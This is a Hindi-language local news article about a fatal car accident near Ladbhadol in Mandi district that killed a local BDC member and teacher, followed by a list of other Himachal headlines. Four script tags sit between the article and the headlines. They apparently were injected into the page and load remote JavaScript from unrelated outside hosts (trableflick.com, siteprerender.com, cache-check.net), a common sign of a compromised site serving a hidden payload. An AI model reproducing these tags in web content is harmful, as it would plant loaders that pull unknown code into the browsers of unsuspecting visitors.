<p>जिला मंडी में लडभडोल क्षेत्र के पीहड़ बेहड़लू पंचायत के निवासी रविन्द्र ठाकुर की वीरवार लगभग 8 बजे कार दुर्घटना में मौत हो गई। यह हादसा एहजू – गोलवां लड़भडोल सड़क पर तरामट घट गांव के पास हुआ है। मृतक व्यक्ति की पहचान रविंद्र कुमार पुत्र मंगतराम निवासी रेंस के रूप में हुई है।</p>
<p>जानकारी के अनुसार रविंद्र ठाकुर एहजू की ओर से लड़भडोल की ओर आ रहे थे तभी तरामट के पास उनकी कार (HP-29B-3523) अनियंत्रित होकर सड़क से 40 मीटर नीचे लुढ़क गई। इस हादसे में रविंद्र ठाकुर गंभीर रूप से घायल हो गए और उन्हें 108 एंबुलेंस की मदद से बैजनाथ अस्पताल पहुंचाया गया प्राथमिक उपचार के बाद हालत गंभीर होने पर उन्हें टांडा रैफर किया गया लेकिन तबीयत ज्यादा खराब होने पर परिजनों ने उन्हें सिविल अस्पताल पालमपुर में भर्ती करवाया जहां कुछ देर बाद उन्होंने दम तोड़ दिया।</p>
<p>घटना की सूचना मिलते ही चौंतड़ा पुलिस भी मौके पर पहुंची और छानबीन शुरू कर दी। मामले की पुष्टि करते हुए मुख्य आरक्षी चमन लाल ने बताया कि शव का पोस्टमार्टम करने के बाद परिजनों को सौंप दिया जाएगा। जानकारी के अनुसार मृतक रविंदर ठाकुर पीहड़ बेहड़लू और गंगोटी पंचायत के बीडीसी सदस्य थे। साथ ही एक निजी स्कूल में बतौर शारीरिक शिक्षक कार्यरत थे उनके निधन से क्षेत्र में शोक की लहर है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1596189803460″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Kinnaur truck accident: किन्नौर ज़िले के निगुलसरी के पास एक सड़क दुर्घटना में एक ईंटों…
Sanjauli Mosque Demolition Controversy: राजधानी शिमला के संजौली क्षेत्र में स्थित मस्जिद की तीन अवैध…
CM Sukhu Announcement: मुख्यमंत्री सुखविंदर सिंह सुक्खू ने बुधवार को आईजीएमसी ट्रॉमा सैंटर के लोकार्पण…
शाहपुर का जिला स्तरीय दशहरा मेले का शुभारंभ भव्य शोभा यात्रा के साथ हुआ।…
CM Sukhwinder Singh Sukhu: हिमाचल प्रदेश के मुख्यमंत्री सुखविंदर सिंह सुक्खू ने इंदिरा गांधी मेडिकल…
Vikramaditya Singh Camp Office Mandi : मंडी की सांसद कंगना रनौत द्वारा मंडी में…